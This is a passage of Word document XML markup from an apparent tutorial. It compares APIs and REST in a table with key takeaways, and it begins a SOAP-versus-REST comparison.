                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>REST (Representational State Transfer)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00231500" w:rsidRPr="00CE4B95" w14:paraId="093D1DC8" w14:textId="77777777" w:rsidTr="00231500">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0531A030" w14:textId="77777777" w:rsidR="00231500" w:rsidRPr="00CE4B95" w:rsidRDefault="00231500" w:rsidP="00EA09A3">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Definition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5BDB0C54" w14:textId="77777777" w:rsidR="00231500" w:rsidRPr="00CE4B95" w:rsidRDefault="00231500" w:rsidP="00EA09A3">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A set of functions or protocols that allow software components to communicate with each other.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D74E9DF" w14:textId="77777777" w:rsidR="00231500" w:rsidRPr="00CE4B95" w:rsidRDefault="00231500" w:rsidP="00EA09A3">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An architectural style used for designing networked applications using stateless communication.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00231500" w:rsidRPr="00CE4B95" w14:paraId="36CCF264" w14:textId="77777777" w:rsidTr="00231500">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08AC283F" w14:textId="77777777" w:rsidR="00231500" w:rsidRPr="00CE4B95" w:rsidRDefault="00231500" w:rsidP="00EA09A3">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F90C144" w14:textId="77777777" w:rsidR="00231500" w:rsidRPr="00CE4B95" w:rsidRDefault="00231500" w:rsidP="00EA09A3">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APIs can use various protocols like HTTP, FTP, SOAP, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F53395F" w14:textId="77777777" w:rsidR="00231500" w:rsidRPr="00CE4B95" w:rsidRDefault="00231500" w:rsidP="00EA09A3">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REST APIs specifically use HTTP as the communication protocol.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00231500" w:rsidRPr="00CE4B95" w14:paraId="48F3983D" w14:textId="77777777" w:rsidTr="00231500">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F7BA9FC" w14:textId="77777777" w:rsidR="00231500" w:rsidRPr="00CE4B95" w:rsidRDefault="00231500" w:rsidP="00EA09A3">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Concept</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76352992" w14:textId="77777777" w:rsidR="00231500" w:rsidRPr="00CE4B95" w:rsidRDefault="00231500" w:rsidP="00EA09A3">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API is a broader concept that defines how systems interact. It can be implemented in many ways, including REST, SOAP, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7088BE25" w14:textId="77777777" w:rsidR="00231500" w:rsidRPr="00CE4B95" w:rsidRDefault="00231500" w:rsidP="00EA09A3">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REST is a specific type of API that follows a set of constraints and principles.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00231500" w:rsidRPr="00CE4B95" w14:paraId="787DF213" w14:textId="77777777" w:rsidTr="00231500">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44242D4F" w14:textId="77777777" w:rsidR="00231500" w:rsidRPr="00CE4B95" w:rsidRDefault="00231500" w:rsidP="00EA09A3">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Data Format</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3AEAFEAD" w14:textId="77777777" w:rsidR="00231500" w:rsidRPr="00CE4B95" w:rsidRDefault="00231500" w:rsidP="00EA09A3">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APIs can use different data formats, such as XML, JSON, or even binary.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6438F78E" w14:textId="77777777" w:rsidR="00231500" w:rsidRPr="00CE4B95" w:rsidRDefault="00231500" w:rsidP="00EA09A3">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REST typically uses JSON or XML as the data format for communication.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00231500" w:rsidRPr="00CE4B95" w14:paraId="08BEAA5F" w14:textId="77777777" w:rsidTr="00231500">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12BCCDE6" w14:textId="77777777" w:rsidR="00231500" w:rsidRPr="00CE4B95" w:rsidRDefault="00231500" w:rsidP="00EA09A3">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Statelessness</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7033A1EE" w14:textId="77777777" w:rsidR="00231500" w:rsidRPr="00CE4B95" w:rsidRDefault="00231500" w:rsidP="00EA09A3">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APIs are not necessarily stateless. They might require sessions or cookies to maintain state.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07D81C34" w14:textId="77777777" w:rsidR="00231500" w:rsidRPr="00CE4B95" w:rsidRDefault="00231500" w:rsidP="00EA09A3">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REST APIs are stateless, meaning each request from the client must contain all the information needed to understand and process it.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00231500" w:rsidRPr="00CE4B95" w14:paraId="45493771" w14:textId="77777777" w:rsidTr="00231500">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="159AA9D3" w14:textId="77777777" w:rsidR="00231500" w:rsidRPr="00CE4B95" w:rsidRDefault="00231500" w:rsidP="00EA09A3">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Flexibility</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6971B6AD" w14:textId="77777777" w:rsidR="00231500" w:rsidRPr="00CE4B95" w:rsidRDefault="00231500" w:rsidP="00EA09A3">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APIs can be more flexible and can follow any design, depending on the need.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A79FF70" w14:textId="77777777" w:rsidR="00231500" w:rsidRPr="00CE4B95" w:rsidRDefault="00231500" w:rsidP="00EA09A3">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REST strictly follows constraints like statelessness, client-server architecture, uniform interface, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00231500" w:rsidRPr="00CE4B95" w14:paraId="6A61398A" w14:textId="77777777" w:rsidTr="00231500">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24E0B608" w14:textId="77777777" w:rsidR="00231500" w:rsidRPr="00CE4B95" w:rsidRDefault="00231500" w:rsidP="00EA09A3">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Communication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5BB40B6D" w14:textId="77777777" w:rsidR="00231500" w:rsidRPr="00CE4B95" w:rsidRDefault="00231500" w:rsidP="00EA09A3">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APIs can be synchronous (request-response) or asynchronous (event-based).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2527291E" w14:textId="77777777" w:rsidR="00231500" w:rsidRPr="00CE4B95" w:rsidRDefault="00231500" w:rsidP="00EA09A3">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REST is typically synchronous and follows the request-response model.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00231500" w:rsidRPr="00CE4B95" w14:paraId="747FA455" w14:textId="77777777" w:rsidTr="00231500">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2EE95493" w14:textId="77777777" w:rsidR="00231500" w:rsidRPr="00CE4B95" w:rsidRDefault="00231500" w:rsidP="00EA09A3">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Example</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="485E6564" w14:textId="77777777" w:rsidR="00231500" w:rsidRPr="00CE4B95" w:rsidRDefault="00231500" w:rsidP="00EA09A3">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A payment gateway API allowing an e-commerce site to make payment transactions.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68648CEF" w14:textId="77777777" w:rsidR="00231500" w:rsidRPr="00CE4B95" w:rsidRDefault="00231500" w:rsidP="00EA09A3">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A REST API used to access user data from a web service using HTTP methods (GET, POST, PUT, DELETE).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5FD04637" w14:textId="77777777" w:rsidR="00231500" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00EA09A3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="01937442">
          <v:rect id="_x0000_i1959" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="54229734" w14:textId="77777777" w:rsidR="00231500" w:rsidRPr="00CE4B95" w:rsidRDefault="00231500" w:rsidP="00EA09A3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Key Takeaways:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0F7CF5" w14:textId="77777777" w:rsidR="00231500" w:rsidRPr="00CE4B95" w:rsidRDefault="00231500" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1774"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a general concept of defining how software components interact, whereas </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>REST</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a specific style of designing APIs using HTTP and a set of architectural constraints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43399F64" w14:textId="77777777" w:rsidR="00231500" w:rsidRPr="00CE4B95" w:rsidRDefault="00231500" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1774"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>REST APIs</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are just a type of API designed to work over HTTP and follow RESTful principles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28359CEE" w14:textId="26DB1BE2" w:rsidR="00CB59EE" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00CB59EE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:pict w14:anchorId="1858EF25">
          <v:rect id="_x0000_i1960" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EF4CA8" w14:textId="0DF95B01" w:rsidR="009E74CB" w:rsidRPr="00CE4B95" w:rsidRDefault="00D05080">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="398" w:name="_Toc196307878"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between SOAP and REST</w:t>
      </w:r>
      <w:r w:rsidR="009E74CB" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="398"/>
    </w:p>
    <w:p w14:paraId="25F06A73" w14:textId="66FF5130" w:rsidR="002A079D" w:rsidRPr="00753240" w:rsidRDefault="002A079D" w:rsidP="003B6002">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00753240">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Difference Between SOAP and RES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5"/>
        <w:gridCol w:w="4209"/>
        <w:gridCol w:w="4470"/>
      </w:tblGrid>
      <w:tr w:rsidR="006529AB" w:rsidRPr="00CE4B95" w14:paraId="537287A8" w14:textId="77777777" w:rsidTr="002A079D">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1330765A" w14:textId="77777777" w:rsidR="002A079D" w:rsidRPr="00CE4B95" w:rsidRDefault="002A079D" w:rsidP="006529AB">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4539137E" w14:textId="77777777" w:rsidR="002A079D" w:rsidRPr="00CE4B95" w:rsidRDefault="002A079D" w:rsidP="006529AB">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>SOAP (Simple Object Access Protocol)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39AD967A" w14:textId="77777777" w:rsidR="002A079D" w:rsidRPr="00CE4B95" w:rsidRDefault="002A079D" w:rsidP="006529AB">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>REST (Representational State Transfer)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006529AB" w:rsidRPr="00CE4B95" w14:paraId="598C3540" w14:textId="77777777" w:rsidTr="002A079D">
        <w:trPr>
